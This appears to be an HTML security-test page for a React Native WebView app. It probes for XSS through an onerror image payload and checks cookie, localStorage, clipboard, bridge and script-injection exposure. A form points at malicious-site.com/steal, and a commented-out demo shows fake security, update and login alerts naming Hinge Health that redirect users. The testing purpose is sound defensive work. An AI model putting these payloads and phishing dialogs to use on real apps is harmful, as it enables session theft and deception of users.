<!-- <!DOCTYPE html>
<html>
<head>
<title>XSS Redirect Attack Demo</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; background: #2c3e50; color: white; }
.result { padding: 10px; margin: 5px 0; border-radius: 5px; }
.success { background: #27ae60; }
.danger { background: #e74c3c; }
.warning { background: #f39c12; }
button { padding: 10px 15px; background: #e67e22; color: white; border: none; border-radius: 5px; margin: 5px; }
</style>
</head>
<body>
<h1>🚨 XSS Redirect Attack Demo</h1>
<p>This demonstrates how XSS attacks can trick users with fake alerts and redirect them to malicious sites.</p>
<div id="results"></div>
<button onclick="fakeSecurityAlert()">🚨 Fake Security Alert</button>
<button onclick="fakeAppUpdate()">📱 Fake App Update Alert</button>
<button onclick="fakeLoginExpired()">🔑 Fake Login Expired</button>
<button onclick="immediateRedirect()">🔗 Immediate Redirect</button>
<script>
function log(test, status, details) {
const div = document.createElement('div');
div.className = 'result ' + (status === 'SUCCESS' ? 'danger' : status === 'BLOCKED' ? 'success' : 'warning');
div.innerHTML = '<strong>' + test + ':</strong> ' + status + ' - ' + details;
document.getElementById('results').appendChild(div);
// Log to React Native
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'XSS_REDIRECT_LOG',
test: test,
status: status,
details: details
}));
}
}
function fakeSecurityAlert() {
log('Fake Alert', 'EXECUTING', '🚨 Showing fake security alert...');
const userClicked = confirm('🚨 SECURITY ALERT: Your account may be compromised! Your login session has been detected from an unusual location. Click OK to secure your account immediately or your data may be at risk!');
if (userClicked) {
log('Social Engineering', 'SUCCESS', '🎣 User clicked OK on fake security alert!');
log('Redirect Attack', 'EXECUTING', '🔗 Redirecting to haveibeenpwned.com...');
// Send notification to React Native before redirect
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'REDIRECT_ATTACK_SUCCESS',
message: 'User fell for fake security alert and will be redirected',
targetUrl: 'https://haveibeenpwned.com/',
attackType: 'fake_security_alert'
}));
}
// Redirect after short delay
setTimeout(() => {
window.location.href = 'https://haveibeenpwned.com/';
}, 1000);
} else {
log('Social Engineering', 'PARTIAL', '⚠️ User cancelled but still saw convincing fake alert');
}
}
function fakeAppUpdate() {
log('Fake Update', 'EXECUTING', '📱 Showing fake app update alert...');
const userClicked = confirm('📱 APP UPDATE REQUIRED: A critical security update is available for Hinge Health. Click OK to download the latest version to protect your health data.');
if (userClicked) {
log('App Update Scam', 'SUCCESS', '🎣 User clicked on fake app update!');
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'FAKE_UPDATE_SUCCESS',
message: 'User fell for fake app update scam'
}));
}
// Redirect to "update" site (actually haveibeenpwned.com)
setTimeout(() => {
window.location.href = 'https://haveibeenpwned.com/';
}, 1000);
} else {
log('App Update Scam', 'PARTIAL', '⚠️ User dismissed fake update alert');
}
}
function fakeLoginExpired() {
log('Login Scam', 'EXECUTING', '🔑 Showing fake login expired alert...');
const userClicked = confirm('🔑 SESSION EXPIRED: Your Hinge Health session has expired for security reasons. Click OK to re-authenticate and continue using the app.');
if (userClicked) {
log('Login Redirect', 'SUCCESS', '🎣 User clicked on fake login expired alert!');
if (window.ReactNativeWebView) {
window.ReactNativeWebView.postMessage(JSON.stringify({
type: 'FAKE_LOGIN_SUCCESS',
message: 'User will be redirected to fake login page'
}));
}
// Redirect to "login" page (haveibeenpwned for demo)
setTimeout(() => {
window.location.href = 'https://haveibeenpwned.com/';
}, 1000);
} else {
log('Login Redirect', 'PARTIAL', '⚠️ User dismissed but saw convincing login scam');
}
}
function immediateRedirect() {
log('Immediate Redirect', 'EXECUTING', '🔗 Attempting immediate redirect without user interaction...');
try {
// Try silent redirect
window.location.href = 'https://haveibeenpwned.com/';
log('Silent Redirect', 'SUCCESS', '🚨 CRITICAL: Silent redirect successful - user sent away without consent!');
} catch (e) {
log('Silent Redirect', 'BLOCKED', '🛡️ Silent redirect blocked: ' + e.message);
}
}
// Auto-execute the fake security alert after 2 seconds to simulate real attack
setTimeout(() => {
log('Auto Attack', 'STARTING', '⏰ Auto-executing fake security alert in 3 seconds...');
setTimeout(() => {
fakeSecurityAlert();
}, 3000);
}, 2000);
</script>
</body>
</html> -->
<!DOCTYPE html>
<html>
<head>
<title>XSS Security Test</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; }
.result { padding: 10px; margin: 5px 0; border-radius: 5px; }
.success { background: #d4edda; color: #155724; }
.danger { background: #f8d7da; color: #721c24; }
.warning { background: #fff3cd; color: #856404; }
</style>
</head>
<body>
<h1>🔍 Simple XSS & Security Test</h1>
<div id="results"></div>
<script>
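/**
 * Append one result row to #results.
 *
 * @param {string} test - Name of the check being reported.
 * @param {string} status - 'VULNERABLE' renders red, 'PROTECTED' green; any other value renders as a warning.
 * @param {string} details - Free-text explanation. Callers pass data read from the page
 *   (cookie values, clipboard text, error messages) in here, so it is rendered as text only.
 */
function log(test, status, details) {
  const div = document.createElement('div');
  const tone = status === 'VULNERABLE' ? 'danger'
    : status === 'PROTECTED' ? 'success'
    : 'warning';
  div.className = 'result ' + tone;

  const label = document.createElement('strong');
  label.textContent = test + ':';
  div.appendChild(label);

  // Text node, not innerHTML: otherwise the logger itself re-injects whatever it is
  // reporting on (a cookie or clipboard value containing markup, for instance) into the page.
  div.appendChild(document.createTextNode(' ' + status + ' - ' + details));

  document.getElementById('results').appendChild(div);
}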
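// Test 1: Basic XSS - inline event handler injected through HTML.
// Inserting markup never throws, and the <img onerror> handler only runs later (after the
// image fetch fails), so a synchronous log line cannot tell whether it executed: the catch
// branch below is effectively dead and the result would be reported as VULNERABLE regardless.
// The handler therefore records a flag on window that is inspected on a later turn; a CSP
// that disallows inline handlers leaves the flag unset.
try {
  window.__xssInlineHandlerRan = false;
  // insertAdjacentHTML adds the probe without re-parsing the whole body the way
  // `innerHTML +=` does (which replaces every existing element, #results included).
  document.body.insertAdjacentHTML(
    'beforeend',
    '<img src="x" alt="" onerror="window.__xssInlineHandlerRan = true; alert(\'XSS Alert Test\')">'
  );
  setTimeout(() => {
    if (window.__xssInlineHandlerRan === true) {
      log('XSS Alert', 'VULNERABLE', '🚨 Injected inline handler ran - alert() works, could show fake dialogs');
    } else {
      log('XSS Alert', 'PROTECTED', '🛡️ Injected inline handler did not run (not yet, or blocked by CSP)');
    }
  }, 1500);
} catch (e) {
  log('XSS Alert', 'PROTECTED', '🛡️ XSS alert blocked: ' + e.message);
}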
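// Test 2: Cookie theft (your main concern)
// Only cookies without the HttpOnly flag are visible to script, so an empty
// document.cookie here means "nothing exposed to JS", not "no cookies set".
try {
  const cookies = document.cookie;
  const looksLikeAuth = ['token', 'auth', 'jwt'].some((marker) => cookies.includes(marker));
  if (looksLikeAuth) {
    // Truncated: the value ends up in the on-page log, so keep the exposure minimal.
    log('Cookie Theft', 'VULNERABLE', '🚨 CRITICAL: Found auth cookies: ' + cookies.slice(0, 100));
  } else if (cookies.length > 0) {
    log('Cookie Access', 'WARNING', 'Can read cookies: ' + cookies.slice(0, 50));
  } else {
    log('Cookie Access', 'PROTECTED', '🛡️ No cookies accessible');
  }
} catch (e) {
  // Reading document.cookie can throw (e.g. from a sandboxed/opaque origin); say why, like the other tests do.
  log('Cookie Access', 'PROTECTED', '🛡️ Cookie access blocked: ' + e.message);
}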
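// Test 3: Local storage access
// The probe key is removed again so the test leaves no residue in the app's storage,
// and the read value is compared with what was written so a stale key from an earlier
// run cannot produce a false positive.
try {
  localStorage.setItem('xss_test', 'malicious_data');
  try {
    const testData = localStorage.getItem('xss_test');
    if (testData === 'malicious_data') {
      log('Local Storage', 'VULNERABLE', '⚠️ Can write/read localStorage');
    } else {
      log('Local Storage', 'PROTECTED', '🛡️ localStorage write failed');
    }
  } finally {
    localStorage.removeItem('xss_test');
  }
} catch (e) {
  log('Local Storage', 'PROTECTED', '🛡️ localStorage blocked: ' + e.message);
}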
// Test 4: React Native bridge access
// Any script running in this WebView can post to the bridge; whether that matters depends on
// what the native side does with an unexpected message, which cannot be observed from here.
if (!window.ReactNativeWebView) {
  log('Bridge Access', 'PROTECTED', '🛡️ No React Native bridge found');
} else {
  try {
    const probe = {
      type: 'XSS_BRIDGE_TEST',
      maliciousPayload: 'test_data',
      attemptedAction: 'steal_user_token',
    };
    window.ReactNativeWebView.postMessage(JSON.stringify(probe));
    log('Bridge XSS', 'WARNING', '⚠️ Can send messages to React Native app');
  } catch (e) {
    log('Bridge XSS', 'PROTECTED', '🛡️ Bridge messaging blocked');
  }
}
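// Test 5: URL manipulation
// pushState would otherwise leave the address bar at /malicious-redirect for the rest of the
// session and for every later test; the original URL is restored once the check has been made.
try {
  const originalUrl = window.location.href;
  window.history.pushState({}, '', '/malicious-redirect');
  try {
    if (window.location.href !== originalUrl) {
      log('URL Manipulation', 'VULNERABLE', '⚠️ Can manipulate browser URL');
    } else {
      log('URL Manipulation', 'PROTECTED', '🛡️ URL manipulation blocked');
    }
  } finally {
    // Rewrite the entry pushState created rather than navigating back (history.back() is asynchronous).
    window.history.replaceState({}, '', originalUrl);
  }
} catch (e) {
  log('URL Manipulation', 'PROTECTED', '🛡️ URL manipulation blocked: ' + e.message);
}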
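// Test 6: Script injection
// A <script> element appended to the document runs synchronously, so the marker it sets can be
// checked right away. Both the element and the marker are removed afterwards so nothing injected
// by the test stays behind.
try {
  const script = document.createElement('script');
  // textContent sets the script source directly instead of going through the HTML fragment parser.
  script.textContent = 'window.injectedMaliciousCode = true;';
  document.head.appendChild(script);
  try {
    if (window.injectedMaliciousCode === true) {
      log('Script Injection', 'VULNERABLE', '🚨 Can inject and execute scripts');
    } else {
      log('Script Injection', 'PROTECTED', '🛡️ Script injection blocked');
    }
  } finally {
    script.remove();
    delete window.injectedMaliciousCode;
  }
} catch (e) {
  log('Script Injection', 'PROTECTED', '🛡️ Script injection blocked: ' + e.message);
}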
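// Test 7: Form hijacking
// The form is built with DOM APIs rather than innerHTML, is never submitted, and is removed
// right after it has been attached, so no element pointing at a third-party action is left in
// the page for a user (or a later test) to trigger.
try {
  const form = document.createElement('form');
  form.method = 'POST';
  form.action = 'https://malicious-site.com/steal';
  const field = document.createElement('input');
  field.type = 'hidden';
  field.name = 'stolen_data';
  field.value = 'user_session';
  form.appendChild(field);
  document.body.appendChild(form);
  form.remove();
  log('Form Injection', 'WARNING', '⚠️ Can inject forms (potential phishing)');
} catch (e) {
  log('Form Injection', 'PROTECTED', '🛡️ Form injection blocked: ' + e.message);
}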
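// Test 8: Clipboard access
// writeText overwrites whatever the user currently has on the clipboard, and readText exposes
// the clipboard to the page; the value read is truncated before it is written into the log.
// Both calls are asynchronous, so their rows can appear after later tests have reported.
if (navigator.clipboard) {
  navigator.clipboard.writeText('MALICIOUS_CLIPBOARD_DATA').then(() => {
    log('Clipboard Write', 'WARNING', '⚠️ Can write to clipboard');
  }).catch((e) => {
    log('Clipboard Write', 'PROTECTED', '🛡️ Clipboard write blocked: ' + e.message);
  });
  navigator.clipboard.readText().then((text) => {
    if (text) {
      log('Clipboard Read', 'VULNERABLE', '🚨 Can read clipboard: ' + text.slice(0, 50));
    } else {
      // An empty clipboard is still a successful read, so it gets a row as well.
      log('Clipboard Read', 'WARNING', '⚠️ Can read clipboard (currently empty)');
    }
  }).catch((e) => {
    log('Clipboard Read', 'PROTECTED', '🛡️ Clipboard read blocked: ' + e.message);
  });
} else {
  log('Clipboard API', 'PROTECTED', '🛡️ Clipboard API not available');
}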
// Auto-run tests
// Fires 2 s after load; the clipboard promises from Test 8 may still be pending at that point.
setTimeout(() => {
  log('Auto Test', 'INFO', '✅ XSS security tests completed automatically');
  // Send results to React Native
  const bridge = window.ReactNativeWebView;
  if (bridge) {
    const summary = {
      type: 'XSS_TEST_COMPLETE',
      message: 'Simple XSS security tests completed',
    };
    bridge.postMessage(JSON.stringify(summary));
  }
}, 2000);
</script>
</body>
</html>